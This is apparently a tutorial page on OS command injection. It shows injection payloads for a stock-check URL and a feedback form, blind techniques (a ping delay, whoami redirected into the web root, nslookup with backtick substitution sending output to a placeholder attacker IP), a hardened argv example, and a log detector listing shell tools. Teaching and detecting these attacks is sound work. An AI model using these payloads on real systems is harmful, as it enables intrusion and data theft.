
OS Command Injection

PRACTICE ! PRACTICE ! PRACTICE !

OS command injection is a vulnerability that allows an attacker to execute operating system commands on the server that is running an application.

Executing arbitrary commands

https://website.com/stockStatus?productID=381&storeID=29

To provide the stock information, the application calls out to a shell command with the product and store IDs as arguments: stockreport.pl 381 29

This command outputs the stock status for the specified item, which is returned to the user.

An Attacker can,

& echo hacked &

If this is supplied as the productID in the URL above, the resulting shell command looks like:

stockreport.pl & echo hacked & 29

The echo command simply prints the string, and & is a shell command separator, so the shell runs three commands in turn: the stock report (now with no arguments), the injected echo, and 29 (which fails because no such command exists). The echoed string appears in the application's response, which confirms the injection.
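To make the difference between the two ways of launching the report visible, the following is an added example (not code from this GitBook): it models how a POSIX shell tokenises the concatenated command line so the extra commands become visible, and beside it shows the hardened pattern, an allowlist check on each ID followed by an argument vector passed without a shell. The script name stockreport.pl is taken from the page and is never executed here; the tokeniser is a deliberate simplification and handles only the separators the page uses.

```python
import re
import shlex
import subprocess
import sys
from typing import List

# Report script named on the page; it is only used to build strings, never run.
STOCK_REPORT = "stockreport.pl"

# Tokens a POSIX shell treats as command separators.
SEPARATORS = {";", "&", "&&", "|", "||"}


def build_vulnerable(product_id: str, store_id: str) -> str:
    """The flawed pattern: user input is concatenated into one command string
    that will be handed to a shell (system(), subprocess with shell=True, ...)."""
    return f"{STOCK_REPORT} {product_id} {store_id}"


def shell_commands(cmdline: str) -> List[List[str]]:
    """Tokenise a command line the way a POSIX shell would and split it into the
    separate commands the shell would run. This only models the parsing step so
    the effect of injected separators is visible; nothing is executed."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands: List[List[str]] = []
    current: List[str] = []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


# Allowlist for the two IDs: a short run of decimal digits and nothing else.
ID_PATTERN = re.compile(r"[0-9]{1,10}")


def build_safe_argv(product_id: str, store_id: str) -> List[str]:
    """Hardened pattern: allowlist-validate each value, then build an argument
    vector. Passed to subprocess.run(argv) with shell=False, no shell ever parses
    the user input, so metacharacters cannot start a second command."""
    for name, value in (("productID", product_id), ("storeID", store_id)):
        if not ID_PATTERN.fullmatch(value):
            raise ValueError(f"{name} must be a decimal integer, got {value!r}")
    return [STOCK_REPORT, product_id, store_id]


def literal_argv(value: str) -> str:
    """Show that an argv entry reaches the child process verbatim when no shell
    is involved: a Python child process simply prints back its first argument."""
    child = [sys.executable, "-c", "import sys; print(sys.argv[1])", value]
    result = subprocess.run(child, capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    payload = "& echo hacked &"
    print("vulnerable:", shell_commands(build_vulnerable(payload, "29")))
    print("argv child saw:", repr(literal_argv(payload)))
    try:
        build_safe_argv(payload, "29")
    except ValueError as err:
        print("rejected:", err)
```

The validation step is the primary control; the argument vector is the second layer that holds even when validation is later loosened, because the payload arrives at the program as a single literal argument rather than as three shell commands.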

Blind OS command injection

Most real-world instances are blind OS command injections: the application does not return the command's output in its HTTP response.

Consider a website that lets users submit feedback about the site. The user enters their email address and a feedback message.

The server-side application then generates an email to a site administrator containing the feedback. To do this, it calls out to the mail program with the submitted details.

`mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com`

The output of the mail command is not returned in the application response. To detect this blind vulnerability, we can inject a command that causes a measurable time delay:

; ping -c 5 127.0.0.1

Five ICMP requests to the loopback address are sent one second apart, so the response is delayed by roughly five seconds if the injected command runs.

Blind OS Command Injection by redirecting output

We can redirect the command's output into a file inside the web root and then retrieve that file through the browser.

; whoami > /var/www/static/whoami.txt ;

We can then retrieve it with:

https://website.com/whoami.txt

In the feedback form, the same idea placed in the email field looks like: email=t||whoami > /var/www/images/whoami.txt||

Blind OS Command Injection using out-of-band technique

Inject a command that triggers an out-of-band network interaction with a system that you control.

; nslookup d0pt3x.gitbook.io ;

This payload uses the nslookup command to cause a DNS lookup for the specified domain; the lookup arriving at a DNS server you control confirms that the command was executed. The variant below combines it with backtick command substitution:

||nslookup `whoami` <ATTACKER IP>||
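On the defending side, every payload shape in this page (a separator followed by a command, a redirect into the web root, backtick or $( ) substitution) leaves a trace in the web server's access log even when the injection is blind. The following is an added example, not code from this GitBook: a small detector that parses constructed common-log-format lines, URL-decodes each query parameter and flags values that match those shapes. The log lines, IP addresses and the domain oob.example are constructed for the demonstration; the command wordlist is an assumption and should be tuned to the application.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (common log format), not taken from the page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:10:01:02 +0000] "GET /stockStatus?productID=381&storeID=29 HTTP/1.1" 200 512
203.0.113.5 - - [10/May/2024:10:01:09 +0000] "GET /stockStatus?productID=%26+echo+hacked+%26&storeID=29 HTTP/1.1" 200 498
198.51.100.7 - - [10/May/2024:10:02:15 +0000] "GET /feedback?email=t%7C%7Cwhoami+%3E+/var/www/images/whoami.txt%7C%7C&msg=hi HTTP/1.1" 200 120
198.51.100.7 - - [10/May/2024:10:02:40 +0000] "GET /feedback?email=a%40b.com&msg=%3B+nslookup+oob.example+%3B HTTP/1.1" 200 120
198.51.100.7 - - [10/May/2024:10:03:01 +0000] "GET /feedback?email=a%60id%60%40x.com&msg=hello HTTP/1.1" 200 120
192.0.2.9 - - [10/May/2024:10:03:30 +0000] "GET /search?q=salt+%26+pepper HTTP/1.1" 200 2048
"""

# ip, ident, user, [timestamp], "method target protocol", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Assumed wordlist of commands commonly seen after an injected separator.
CMD = r"(?:whoami|id|uname|hostname|cat|echo|ping|nslookup|dig|curl|wget|sleep|nc|bash|sh|python3?|perl)"

# Ordered rules; the first match names the finding.
RULES = [
    ("command-substitution", re.compile(r"`[^`]+`|\$\([^)]*\)")),
    ("separator+command", re.compile(r"[;&|`\n]\s*" + CMD + r"\b")),
    ("redirect-to-path", re.compile(r"[;&|][^>]*>\s*/")),
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one common-log-format line; return None for lines that do not fit."""
    match = LOG_RE.match(line)
    if not match:
        return None
    ip, ts, method, target, status, _size = match.groups()
    return {"ip": ip, "time": ts, "method": method, "target": target, "status": status}


def classify_value(value: str) -> Optional[str]:
    """Return the name of the first rule a decoded parameter value matches, else None.
    A bare '&' inside ordinary text (e.g. 'salt & pepper') is not enough on its own."""
    for name, pattern in RULES:
        if pattern.search(value):
            return name
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Decode every query parameter of every request and collect matching values."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        parts = urlsplit(record["target"])
        # parse_qsl splits on the raw '&' first, then percent-decodes each value,
        # so an encoded %26 inside a value survives as a literal '&' to inspect.
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            rule = classify_value(value)
            if rule:
                findings.append({"ip": record["ip"], "time": record["time"],
                                 "path": parts.path, "param": param,
                                 "value": value, "rule": rule})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']}={f['value']!r} [{f['rule']}]")
```

Requests with a 200 status are the ones to look at most closely, since a blind injection returns a normal-looking response; correlating a flagged request with an outbound DNS query or a new file appearing under the web root turns a string match into a confirmed incident.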